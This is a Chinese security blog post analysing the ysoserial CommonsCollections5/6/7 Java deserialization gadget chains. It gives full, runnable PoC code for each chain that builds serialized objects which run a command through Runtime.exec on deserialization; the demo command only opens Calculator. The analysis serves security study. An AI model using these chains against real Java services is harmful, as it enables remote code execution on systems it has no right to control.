ysoserial反序列化gadget原理-part2:CommonsCollections5/6/7

最新推荐文章于 2024-05-18 16:42:38 发布
最新推荐文章于 2024-05-18 16:42:38 发布
阅读量1.7k 收藏
点赞数
文章标签: java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mole_exp/article/details/122713185
版权

文章目录

前言

前文分析了CommonsCollections1 的原理,它受到了JDK版本的制约。本文来分析一下ysoserlial的CommonsCollections5/6/7 是如何解决这个问题的。

CommonsCollections5

前文分析提到,从JDK 8u71开始,由于AnnotationInvocationHandler#readObject()代码的修改,导致CommonsCollections1的LazyMap#get()无法被调用。那么想解决这个问题,就要找到其他会调用LazyMap#get()的类。CommonsCollections5 用到一个类 org.apache.commons.collections.keyvalue.TiedMapEntry,它是commons-collections 这个库中的类。

TiedMapEntry

TiedMapEntryMap对象的一个封装类,可对Map对象的操作进行控制。
在这个类里,在成员方法TiedMapEntry#getValue()中调用了内部Map对象的get()方法。而成员方法TiedMapEntry#equals()TiedMapEntry#hashCode()TiedMapEntry#toString() 都调用了TiedMapEntry#getValue()

在ysoserial CommonsCollections5中,作者使用了 BadAttributeValueExpException类,这个类的readObject()方法会调用其成员变量valtoString()方法。那么我们只要把TiedMapEntry对象赋值给val即可。

PoC

public static void main(String[] args) {
    try {
        Transformer[] transformers = new Transformer[]{
            //Runtime类没有实现 java.io.Serializable 接口,
            //   所以不能被序列化,所以得换以下这种方式
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
            ),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
            ),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a Calculator"}
            ),
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "foo");
        BadAttributeValueExpException badAttrValExpException = new BadAttributeValueExpException(null);
        Field val = badAttrValExpException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttrValExpException, tiedMapEntry);
        
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(badAttrValExpException);
        System.out.println(baos.toString());
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
        Object o = ois.readObject();
    } catch (Exception e) {
        e.printStackTrace();
    }
}

gadget chain

BadAttributeValueExpException#readObject()
  TiedMapEntry#toString()
    TiedMapEntry#getValue()
      LazyMap#get()
        ChainedTransformer#transform()
          ConstantTransformer#transform()
          InvokerTransformer#transform()
            Method#invoke() -> Class.getMethod()
          InvokerTransformer#transform()
            Method#invoke() -> Runtime.getRuntime()
          InvokerTransformer#transform()
            Method#invoke() -> Runtime.exec()

问题1

为什么TiedMapEntry不通过BadAttributeValueExpException的构造方法传入,而非得通过反射去赋值呢?

答:
因为BadAttributeValueExpException的构造方法,如果传入的不是null而是TiedMapEntry对象,则会立刻调用TiedMapEntry#toString()并将返回值赋值给val。这样的话,在序列化数据生成的过程中就会触发我们构造好的命令执行代码。因此这是原作者为了避免此情况作的优化。
在这里插入图片描述

CommonsCollections6

前面提到,在TiedMapEntry中,成员方法TiedMapEntry#equals()TiedMapEntry#hashCode()TiedMapEntry#toString() 都调用了TiedMapEntry#getValue()

CommonsCollections5 选择使用TiedMapEntry#toString(),而CommonsCollections6 选择了使用TiedMapEntry#hashCode()

剩下的就是寻找反序列化readObject()时能调用到TiedMapEntry#hashCode()方法的类。

这里笔者不打算完全照搬ysoserial 里的实现,因为它略复杂了点,感觉在不影响理解原有利用链的基础上,可以精简一下。

提到hashCode()方法,上一篇文章分析URLDNS gadget的时候就有看到过。HashMapput(key,value)操作的时候,是会调用key对象的hashCode()方法的。而且在HashMap#readObject()方法中会通过put操作来还原自身。

PoC

public static void main(String[] args) {
    try {
        Transformer[] transformers = new Transformer[]{
            //Runtime类没有实现 java.io.Serializable 接口,
            //   所以不能被序列化,所以得换以下这种方式
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
            ),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
            ),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a Calculator"}
            ),
        };
        
        Transformer[] tmpTransformers = new Transformer[] {
            new ConstantTransformer(1),
        };
        
        //这里先构造一个无意义的执行链,因为下面构造序列化数据时,HashMap要进行put操作,
        //  所以这是为了避免生成序列化数据的过程中触发命令执行的代码。
        //在下面put操作后通过反射再将含有命令执行的执行链构造好即可。
        Transformer transformerChain = new ChainedTransformer(tmpTransformers);
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "foo1");
        Map finalMap = new HashMap();
        finalMap.put(tiedMapEntry, "foo2");
        outerMap.remove("foo1");
        
        Field iTransformersField = transformerChain.getClass().getDeclaredField("iTransformers");
        iTransformersField.setAccessible(true);
        iTransformersField.set(transformerChain, transformers);
        
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(finalMap);
        System.out.println(baos.toString());
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
        Object o = ois.readObject();
    } catch (Exception e) {
        e.printStackTrace();
    }
}

问题1

上面的代码中,为什么要执行outerMap.remove("foo1");

答:
假设不加这一句代码。会发生什么呢?结果是我们构造的命令执行的Transformer执行链没有被执行。
原因在HashMap#put()方法。把上面的其中三行代码抽出来解释:

TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "foo1");
Map finalMap = new HashMap();
finalMap.put(tiedMapEntry, "foo2");

HashMap#put()方法被执行,后续会执行LazyMap#get(Object key)方法,此时的key的值是字符串foo1,由于在前面的innerMap集合中我们没有往里面放置任何值,所以innerMap会将foo1作为key放置到自身集合中:
在这里插入图片描述
因此,在后面反序列化的过程中,当LazyMap#get("foo1")时,就不会进入这个if分支,所以我们构造的Transformer执行链就不会执行了。

因此为了解决这个问题,我们必须得在构造序列化数据的时候,执行innerMap#remove("foo1")outerMap#remove("foo1");

gadget chain

HashMap#readObject()
  HashMap#hash()
    TiedMapEntry#hashCode()
      TiedMapEntry#getValue()
        LazyMap#get()
          ChainedTransformer#transform()
            ConstantTransformer#transform()
            InvokerTransformer#transform()
              Method#invoke() -> Class.getMethod()
            InvokerTransformer#transform()
              Method#invoke() -> Runtime.getRuntime()
            InvokerTransformer#transform()
              Method#invoke() -> Runtime.exec()

ysoserial的CommonsCollections6 gadget可能因为考虑得比较周全的,所以显得略复杂,还多用了HashSet类。不过这里简化过的代码,反序列化也可以成功执行命令,而且不影响理解它的本质原理。

CommonsCollections7

与CommonsCollections5、CommonsCollections6类似,CommonsCollections7也是去找什么类可以调LazyMap#get(),其实LazyMap#equals()方法就调用了LazyMap#get()。一般而言,equals()方法用于比较两个对象是否相等。剩下的就是找一个类,它在反序列化过程中,可以自动触发两个LazyMap对象的比较。

按照这个思路,CC7选择使用HashtableHashtable类其实和HashMap差不多,调用put()方法时,存放的位置是由key的hash决定的,如果key的hash与已经存在的某个key的hash一样,则会调用key的equals()方法进行比较。
在这里插入图片描述
那么如果这两个key的类型是LazyMap,则可以触发了两个LazyMap对象的比较:lazymap1.equals(lazymap2)

而在Hashtable的反序列化readObject()的过程中,会调用reconstitutionPut()方法对自身集合的数据进行重新构建,其实就是将反序列化得到的数值或对象进行put()操作。换言之Hashtable的反序列化操作会触发lazymap1.equals(lazymap2)

问题1: 关于HashMap/Hashtable中的hash冲突

有了构造利用链的思路后,剩下就是如何构造有hash冲突的key。所谓hash冲突,就是put()进去的key,与已存在的某个key的hash是一样的情况。

也许你会说,这个简单,put()两个完全一样的key不就好了?实际上,这样会导致Transformer的执行链ChainedTransformer不被执行,原因见LazyMap#get()
在这里插入图片描述
也就是说,我们得构造key不能一样,但其hash值是一样的才行。

计算hash值的方法是hashCode()LazyMap#hashCode(),它会调用内层Map对象的hashCode()方法。我们假设内层Map是一个HashMap类型,看一下HashMap#hashCode()
在这里插入图片描述
在这里插入图片描述
可以看到HashMap的hash值是它的键值对的hash进行异或,然后再累加起来。

这里只关注key的hash值计算即可,value我们可以设置为一模一样的就好,比如简单的Integer类型,其hash值就是其int数值。 在ysoserial中,key取了String类型,且长度为2。我们来看看String的hashCode()方法。从String#hashCode()的注释可以了解到,其算法是:s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1],其代码实现如下:
在这里插入图片描述
假设第一个put()的key为"aa",而字符a的ASCII值是97,则字符串"aa"的hash值计算如下:

loop1:h = 31 * 0 + 97 = 97
loop2:h = 31 * 97 + 97  = 32 * 97 =  3104
hash = h = 3104        ==> 字符串"aa"的hash值

可以看到上面的算式中32作为乘法因子,我们便可以利用大小写字母之间的差值为32来构造与"aa"的hash相同的简单字符串"bB"

loop1:h = 31 * 0 + 98 = 98
loop2:h = 31 * 98 + (98 - 32) = 32 * 98 - 32 = 32 * 97 = 3104
hash = h = 3104        ==> 字符串"bB"的hash值

解决了构造hash冲突的问题,就可以构造PoC了。

PoC - 使用Hashtable

public static void main(String[] args) {
    try {
        Transformer[] transformers = new Transformer[]{
            //Runtime类没有实现 java.io.Serializable 接口,
            //   所以不能被序列化,所以得换以下这种方式
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
            ),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
            ),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a Calculator"}
            ),
        };
        Transformer[] tmpTransformers = new Transformer[] {
            new ConstantTransformer(1),
        };
        //这里先构造一个无意义的执行链,因为下面构造序列化数据时,HashMap要进行put操作,
        //  所以这是为了避免生成序列化数据的过程中触发命令执行的代码。
        //在下面put操作后通过反射再将含有命令执行的执行链构造好即可。
        Transformer transformerChain = new ChainedTransformer(tmpTransformers);
        Map innerMap1 = new HashMap();
        Map outerMap1 = LazyMap.decorate(innerMap1, transformerChain);
        Map innerMap2 = new HashMap();
        Map outerMap2 = LazyMap.decorate(innerMap2, transformerChain);
        //构造可导致hash冲突两个Map对象
        outerMap1.put("aa", 11);
        outerMap2.put("bB", 11);
        
        Hashtable hashtable = new Hashtable();
        hashtable.put(outerMap1, 3);
        hashtable.put(outerMap2, 3);
        outerMap2.remove("aa");
        
        Field iTransformersField = transformerChain.getClass().getDeclaredField("iTransformers");
        iTransformersField.setAccessible(true);
        iTransformersField.set(transformerChain, transformers);
        
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(hashtable);
        System.out.println(baos.toString());
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
        Object o = ois.readObject();
    } catch (Exception e) {
        e.printStackTrace();
    }
}

gadget chain

Hashtable#readObject()
  Hashtable#reconstitutionPut()
    AbstractMapDecorator#equals()
      AbstractMap#equals()
        LazyMap#get()
          ChainedTransformer#transform()
            ConstantTransformer#transform()
            InvokerTransformer#transform()
              Method#invoke() -> Class.getMethod()
            InvokerTransformer#transform()
              Method#invoke() -> Runtime.getRuntime()
            InvokerTransformer#transform()
              Method#invoke() -> Runtime.exec()

问题2

上面的代码中,为什么要执行outerMap2.remove("aa");

答:
原因跟前面的CC6 问题1类似,也是由于LazyMap#get()方法引起的,结果就是导致反序列化时不会导致hash冲突而触发LazyMap#equals()方法。解决方法就是remove掉多余的key。
在这里插入图片描述

问题3:可否将Hashtable换成HashMap?

答:
用HashMap替换Hashtable是可以的。这两个类一般情况下是可替换来用的,区别主要在于线程安全和性能方面而已。

但要移除的多余的key可能得改一下。

PoC - 使用HashMap替换Hashtable

public static void main(String[] args) {
    try {
        Transformer[] transformers = new Transformer[]{
            //Runtime类没有实现 java.io.Serializable 接口,
            //   所以不能被序列化,所以得换以下这种方式
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
            ),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
            ),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"open -a Calculator"}
            ),
        };
        Transformer[] tmpTransformers = new Transformer[] {
            new ConstantTransformer(1),
        };
        //这里先构造一个无意义的执行链,因为下面构造序列化数据时,HashMap要进行put操作,
        //  所以这是为了避免生成序列化数据的过程中触发命令执行的代码。
        //在下面put操作后通过反射再将含有命令执行的执行链构造好即可。
        Transformer transformerChain = new ChainedTransformer(tmpTransformers);
        Map innerMap1 = new HashMap();
        Map outerMap1 = LazyMap.decorate(innerMap1, transformerChain);
        Map innerMap2 = new HashMap();
        Map outerMap2 = LazyMap.decorate(innerMap2, transformerChain);
        //构造可导致hash冲突两个Map对象
        outerMap1.put("aa", 11);
        outerMap2.put("bB", 11);
        
        HashMap hashtable = new HashMap();
        hashtable.put(outerMap1, 3);
        hashtable.put(outerMap2, 3);
        outerMap1.remove("bB");
        
        Field iTransformersField = transformerChain.getClass().getDeclaredField("iTransformers");
        iTransformersField.setAccessible(true);
        iTransformersField.set(transformerChain, transformers);
        
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(hashtable);
        System.out.println(baos.toString());
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
        Object o = ois.readObject();
    } catch (Exception e) {
        e.printStackTrace();
    }
}
xc8qanAFenlka@x1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Java反序列化 C3P0 GadGets1利用链记录(URLClassLoader)
LTianHang的博客
02-06 230
Java反序列化 C3P0 GadGets1利用链记录分析
.NET高级代码审计(第15课) 反序列化Gadget之详解ExpandedWrapper
ahhacker86的专栏
01-08 922
相信通过本文介绍大家对ExpandedWrapper类有了初步的认知,有助于解开XmlSerializer反序列化中核心链路的疑问,下一节将介绍XmlSerializer反序列化漏洞总结篇,请大伙继续关注文章涉及的PDF和Demo已打包发布在星球,扫码进入星球,扫码关注dotNet安全矩阵公众号,欢迎对.NET安全关注和关心的同学加入我们,在这里能遇到有情有义的小伙伴,大家聚在一起做一件有意义的事。欢迎大伙持续关注,交流。
Java反序列化 C3P0 GadGets2利用链记录(JNDI)
LTianHang的博客
02-07 132
Java反序列化 C3P0 GadGets2利用链记录(JNDI)
Jdk7u21 反序列化漏洞Gadget原理
Exploit的小站~
05-10 9709
0x00 昨天看到n1nty发了文章分析深度 - Java 反序列化 Payload 之 JRE8u20,分析了Jre8u20这个Gadgets,读了之后顶礼膜拜,Jre 8u20我并没有研究过,不过看到文章开始提到了7u21中的这个Gadget,可能很多同学对这个原理不是很清楚,所以这里翻出一篇当初分析的原理文分享出来,原文如下: 0x01 对这个Gadget的理解需要一定的java动...
初识Java反序列化
m0_71563599的博客
06-04 1533
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
shiro-1.2.4-rce:shiro <= 1.2.4反序列化命令脚本
05-22
= 1.2.4 反序列化远程命令执行利用脚本 使用延时判断key和gadget,即使目标不出网也可以检测是否存在漏洞 python脚本需要调用ysoserial-sleep.jar,ysoserial-sleep.jar文件并不是原版的,增加了延时命令功能,故...
mw-gadget-Latex2wiki:从 LaTeX 转换为 wikitext 的脚本
07-07
// [[File:User:He7d3r/Tools/Latex2wiki.js]] (workaround for [[phab:T35355]]) mw . loader . load ( '//meta.wikimedia.org/w/index....
构造java探测class反序列化gadget1
08-03
背景你是否遇到过这样的情况,盒环境下有个序列化。你将ysoserial所有gadget的测试了遍,均由于没有报错信息,你根本法确定是下那个原因导致。3. jar
gadget2-AccretionDiscs:gadget2 SPH 代码的修改版本更新用于吸积盘
06-24
gadget2-AccrtionDiscs gadget2 SPH 代码的修改版本已更新,可用于吸积盘。
反序列化整理
weixin_54225453的博客
08-26 159
在PHP反序列化漏洞利用技术POP中,对应的初始化gadgets就是wakeup() 或者是destruct() 方法, 在最理想的情况下能够实现漏洞利用的点就在这两个函数中,但往往我们需要从这个函数开始,逐步的跟进在这个函数中调用到的所有函数,直至找到可以利用的点为止。在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP的反序列化有一种漏洞利用方法叫做 “面向属性编程” ,即 POP( Property Oriented Programming)。换句话说,将保留对象的属性及其分配的值。.
ysoserial反序列化gadget原理-part1:URLDNS/CommonsCollections1
mole_exp的博客
01-27 2669
文章目录前言URLDNS依赖payload构造gadget原理简述Groovy1依赖payload构造gadgetCommons-Beanutils1 前言 其实反序列化利用链分析的文章写起来没啥意思,无非就是函数调用栈的复述,序列化对象(payload)的构造无非就是为了满足某条函数调用的路径而已。如果没有亲自调试过,也是看不懂别人的文章的。但好记性不如烂笔头,况且笔者记性也不是很好,所以还是来篇流水账记录一下之前的学习。 URLDNS 依赖 无 payload构造 注:ysoserial工具里说的pa
ysoserial反序列化gadget原理-part3:CommonsCollections3/2/4
mole_exp的博客
02-11 2933
上一篇文章,笔者收集汇总了Java中动态加载字节码的方法,其中之一就是利用TemplatesImpl去加载类的字节码。而ysoserial中CommonsCollections 3/2/4这三条利用链就用到了TemplatesImpl。
java安全(六)java反序列化2,ysoserial调试
weixin_45694388的博客
04-19 3757
ysoserial 下载地址:https://github.com/angelwhu/ysoserial ysoserial可以让⽤户根据⾃⼰选择的利⽤链,⽣成反序列化利⽤数据,通过将这些数据发送给⽬标,从⽽执⾏⽤户预先定义的命令。 什么是利⽤链? 利⽤链也叫“gadget chains”,我们通常称为gadget。如果你学过PHP反序列化漏洞,那么就可以将gadget理解为⼀种⽅法,它连接的是从触发位置开始到执⾏命令的位置结束,在PHP⾥可能 是 __desctruct 到 eval ;如果你没学过其他语
java安全 反序列化(二)
sechelper的博客
12-07 573
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
[Java反序列化]CommonsCollections5利用链学习
feng的博客
08-16 739
前言 奇奇怪怪的就把CC5给看了。在看一个师傅的CC1的文章的时候,发现他写的LazyMap链不太一样,我以为是CC1的新链,然后也学习了一波,然后查了一下发现是CC5。。。 环境 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId>
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5125
[JAVA反序列化]Commons-Collections5利用链分析
jar包增量更新分析
junlaiyan的专栏
05-16 256
借助jdeps分析出jar包的增量文件
SpringBoot接入Knife4j接口文档
最新发布
博主是个二次元死肥宅~
05-18 674
Knife4j是Java MVC框架集成Swagger生成Api文档的增强解决方案,前身是swagger-bootstrap-ui。
configfs-gadget gadget: high-speed config #1: c
06-06
configfs-gadget gadget是一个用于在Linux内核中实现USB gadget功能的模块,其主要特点是可以实现高速数据传输。USB gadget是指一种被动式USB设备,即USB host将其识别为USB设备而不是USB主机,用于实现USB主机和USB...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值